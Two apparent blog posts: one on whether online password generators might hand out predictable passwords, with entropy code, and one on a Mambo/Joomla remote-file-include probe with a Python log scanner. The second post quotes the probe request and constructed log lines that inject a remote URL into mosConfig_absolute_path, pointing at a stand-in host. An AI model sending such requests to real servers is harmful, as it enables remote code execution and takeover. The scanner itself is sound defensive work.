What if the password generators are hacked?

For many years I have recommended online (and offline) password generators to people who need help making reasonably strong passwords. But I've long had a nagging suspicion trying to express itself, and until now I have not put it into words. So here it is.

What if the password generators are hacked or compromised? More specifically, what if a generator chooses from a fixed list of passwords that brute-force attackers then feed into their automated attacks? Or what if the list of generated passwords leaks and, worse, is stored together with the requesting IP address, so the attacker knows which password was handed to which network?

Any generator that draws from a limited set of passwords shrinks the attacker's search space: a brute-force or dictionary attack that has the list only needs to try those candidates, no matter how random each one looks.

A client once asked why he needed to change a password that an attacker had guessed, since website "X" had rated it "Very Strong". I told him about my favorite password of all time, the one used to launch the US nuclear missiles aimed at the Soviet Union in the movie WarGames. For the last several minutes of the film the password CPE1704TKS is flashing on the screen, until the computer learns from tic-tac-toe that the game cannot be won and stops the launch. Just because CPE1704TKS is a nice letter/number combination unrelated to my user name, domain or pet iguana doesn't mean I should use it for anything: it is a well-known password, which is exactly what a wordlist is made of. The client understood this (non-technical) explanation and changed his password (probably to CPE1704TKS1, but that's another story).

So, just as one cannot use a well-known password even if it is well-formed, should we encourage the use of programmatically generated passwords, let alone website-generated ones, whose set of possible outputs we cannot see?
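To put numbers on the two points above (a generator with a fixed list has only as much entropy as the list is long, and a well-formed but well-known password has none), here is an added example in Python; it is not code from the original post. The KNOWN_PASSWORDS set is a constructed stand-in for a leaked generator list or a film prop, not real breach data, and the character-class estimate in effective_bits is the usual rough heuristic, not a claim about any particular strength meter. The last function shows the alternative the post is hinting at: generating locally with the operating system's CSPRNG, so there is no shared list and no remote party that ever sees the result.

```python
import math
import secrets
import string

# 62-symbol alphabet: upper, lower, digits.
ALPHABET = string.ascii_letters + string.digits

# Constructed stand-in for a list the attacker already has (a leaked
# generator list, a film prop, a previously cracked set). Not real data.
KNOWN_PASSWORDS = frozenset({"CPE1704TKS", "CPE1704TKS1", "Tr0ub4dor&3"})


def bits_for_fixed_list(list_size: int) -> float:
    """Entropy when the generator only ever hands out one of `list_size`
    strings: log2(list_size), however random each string looks."""
    return math.log2(list_size)


def bits_for_random(length: int, alphabet_size: int = len(ALPHABET)) -> float:
    """Entropy of `length` symbols drawn uniformly from `alphabet_size`."""
    return length * math.log2(alphabet_size)


def expected_guesses(bits: float) -> float:
    """An attacker who tries the whole space in random order needs,
    on average, half of it."""
    return 2.0 ** bits / 2


def effective_bits(password: str, known: frozenset = KNOWN_PASSWORDS) -> float:
    """Apparent strength by shape (length x character classes), collapsed
    to 0 when the string is on a list the attacker already has."""
    if not password or password in known:
        return 0.0
    alphabet_size = 0
    if any(c.islower() for c in password):
        alphabet_size += 26
    if any(c.isupper() for c in password):
        alphabet_size += 26
    if any(c.isdigit() for c in password):
        alphabet_size += 10
    if any(not c.isalnum() for c in password):
        alphabet_size += 33  # printable ASCII punctuation
    return len(password) * math.log2(alphabet_size)


def generate_password(length: int = 16, alphabet: str = ALPHABET) -> str:
    """Generate locally with the OS CSPRNG via `secrets`: no shared list,
    no website that logs the result next to your IP address."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    fixed = bits_for_fixed_list(1_000_000)
    random12 = bits_for_random(12)
    print(f"fixed list of 1,000,000: {fixed:.1f} bits, "
          f"~{expected_guesses(fixed):,.0f} guesses on average")
    print(f"12 random symbols from 62: {random12:.1f} bits, "
          f"~{expected_guesses(random12):.3e} guesses on average")
    print(f"CPE1704TKS looks like {effective_bits('CPE1704TKX'):.1f} bits "
          f"but is worth {effective_bits('CPE1704TKS'):.1f}")
    print("locally generated:", generate_password())
```

The comparison is the whole argument: a million-entry list is under 20 bits, which a single machine exhausts in well under a second against an offline hash, while twelve uniformly random alphanumerics are over 71 bits. A generator's output only counts for as many bits as the attacker cannot predict.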

Tell me what you think.

Robot.

Vector of compromise: mosConfig_absolute_path

While reviewing my logs for recent hits on my blog I came across the following request:


 URL: /mosConfig_absolute_path%3Dhttp%3A/[...]/f1.txt
 Date: Monday, January 28, 2008 - 05:59
 Remote Host: 69.57.148.17


Fortunately I am not running Mambo or Joomla (though the blog software I use has troubles of its own). On an unpatched install with PHP's register_globals enabled, a request like this overrides the $mosConfig_absolute_path variable that the application uses to build its include paths, so PHP fetches f1.txt from the attacker's server and executes it as code. The payload in these automated hits typically installs a bot that turns the server into an attack platform for DDoS attacks, spam, IRC bots, phishing pages and a host of illegal content of all kinds.

So, let me ask you: is your server able to survive such an automated attack as this? Is it already serving illegal purposes?
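One concrete way to answer that question is to look for this exact pattern in your own access logs. The following is an added example, not code from the original post: a small Python scanner that URL-decodes each request target (repeatedly, so double encoding is unwrapped), looks for mosConfig_absolute_path= in either the query string or the path itself (the quoted hit puts it in the path), and reports any value that starts with a URL scheme, which is what a remote file include needs. The log lines are constructed to resemble the request above; the host example.invalid stands in for the elided attacker host, and the second and third lines are invented variants.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines, modelled on the request quoted
# above. Hosts and paths are placeholders, not real log data.
SAMPLE_LOG = """\
69.57.148.17 - - [28/Jan/2008:05:59:00 -0500] "GET /mosConfig_absolute_path%3Dhttp%3A//example.invalid/f1.txt HTTP/1.1" 404 312 "-" "Mozilla/4.0"
198.51.100.7 - - [28/Jan/2008:06:03:12 -0500] "GET /index.php?option=com_content&mosConfig_absolute_path=http://example.invalid/f1.txt? HTTP/1.1" 200 1024 "-" "libwww-perl/5.808"
198.51.100.8 - - [28/Jan/2008:06:04:40 -0500] "GET /index.php?mosConfig_absolute_path=%2568ttp%253A%252F%252Fexample.invalid%252Ff1.txt HTTP/1.0" 200 1024 "-" "libwww-perl/5.808"
203.0.113.9 - - [28/Jan/2008:06:07:00 -0500] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.10 - - [28/Jan/2008:06:08:30 -0500] "GET /about/ HTTP/1.1" 200 777 "-" "Mozilla/5.0"
"""

# Common/combined log format: client, ident, user, [timestamp], "request".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# The overridden variable, wherever it appears in the decoded request
# target (query string or, as in the quoted hit, the path itself).
PARAM_RE = re.compile(
    r'mosConfig_absolute_path\s*=\s*(?P<value>[^&\s"]*)', re.IGNORECASE
)
# A remote include needs a URL scheme. A single slash is accepted because
# servers and proxies sometimes collapse "//" when logging.
REMOTE_RE = re.compile(r'^(?:https?|ftp):/', re.IGNORECASE)


def decode_target(target: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double encoding (%253D -> %3D -> =) unwraps."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def remote_include_url(target: str):
    """Return the remote URL being injected into mosConfig_absolute_path,
    or None if the request does not attempt that."""
    for m in PARAM_RE.finditer(decode_target(target)):
        if REMOTE_RE.match(m.group("value")):
            return m.group("value")
    return None


def scan_log(text: str) -> list:
    """Scan access-log text; one dict per request attempting the injection."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = remote_include_url(m.group("target"))
        if url is not None:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "target": m.group("target"),
                "remote_include": url,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} -> {hit["remote_include"]}')
```

Run against a real log, a 404 on such a request means the probe bounced off a path that does not exist, as it did here; a 200 on index.php with this parameter on a Mambo or Joomla host is the line to worry about, and the next thing to check is whether f1.txt (or whatever the attacker named it) was actually fetched and what it dropped. The scanner deliberately ignores local-path values for the same parameter; those are worth flagging too, but they are a different (local include) probe.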
